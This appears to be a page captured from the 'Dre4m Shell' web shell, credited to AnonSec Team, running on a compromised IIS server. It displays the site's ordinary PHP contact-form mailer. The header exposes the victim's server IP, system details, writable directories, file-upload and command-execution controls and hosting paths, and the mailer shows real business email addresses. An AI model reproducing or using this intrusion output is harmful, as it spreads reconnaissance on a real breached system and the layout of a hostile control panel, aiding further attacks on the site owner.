Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.118.140.78
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/cenxusco/supervisor.cenxus.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/Domains/cenxusco/supervisor.cenxus.com/wwwroot/send_mail.php
<?php
/*
This first bit sets the email address that you want the form to be submitted to.
You will need to change this value to a valid email address that you can access.
*/
/*$webmaster_email = "wctsales@wct.my";*/

$webmaster_email = "marketing@dkproperties.com.my, dkmyproperty@gmail.com";

/*
This bit sets the URLs of the supporting pages.
If you change the names of any of the pages, you will need to change the values here.
*/
$feedback_page = "feedback_form.html";
$error_page = "error_message.html";
$thankyou_page = "thankyou.html";

/*
This next bit loads the form field data into variables.
If you add a form field, you will need to add it here.
*/
/*$comments = $_REQUEST['comments'] ;*/
$full_name = $_REQUEST['full_name'] ;
$email_address = $_REQUEST['email_address'] ;
$phone_number = $_REQUEST['phone_number'] ;
$msg = 
"Full Name: " . $full_name . "\r\n" . 
"Email: " . $email_address . "\r\n" . 
"Phone: " . $phone_number ;
/*"Comments: " . $comments ;*/

/*
The following function checks for email injection.
Specifically, it checks for carriage returns - typically used by spammers to inject a CC list.
*/
function isInjected($str) {
	$injections = array('(\n+)',
	'(\r+)',
	'(\t+)',
	'(%0A+)',
	'(%0D+)',
	'(%08+)',
	'(%09+)'
	);
	$inject = join('|', $injections);
	$inject = "/$inject/i";
	if(preg_match($inject,$str)) {
		return true;
	}
	else {
		return false;
	}
}

// If the user tries to access this script directly, redirect them to the feedback form,
if (!isset($_REQUEST['email_address'])) {
header( "Location: $feedback_page" );
}

// If the form fields are empty, redirect to the error page.
elseif (empty($full_name) || empty($email_address)) {
header( "Location: $error_page" );
}

/* 
If email injection is detected, redirect to the error page.
If you add a form field, you should add it here.
*/
elseif ( isInjected($email_address) || isInjected($full_name)  || isInjected($phone_number) ) {
header( "Location: $error_page" );
}

// If we passed all previous tests, send the email then redirect to the thank you page.
else {

	mail( "$webmaster_email", "Feedback Form Results", $msg );

	header( "Location: $thankyou_page" );
}
?>

Anon7 - 2022
AnonSec Team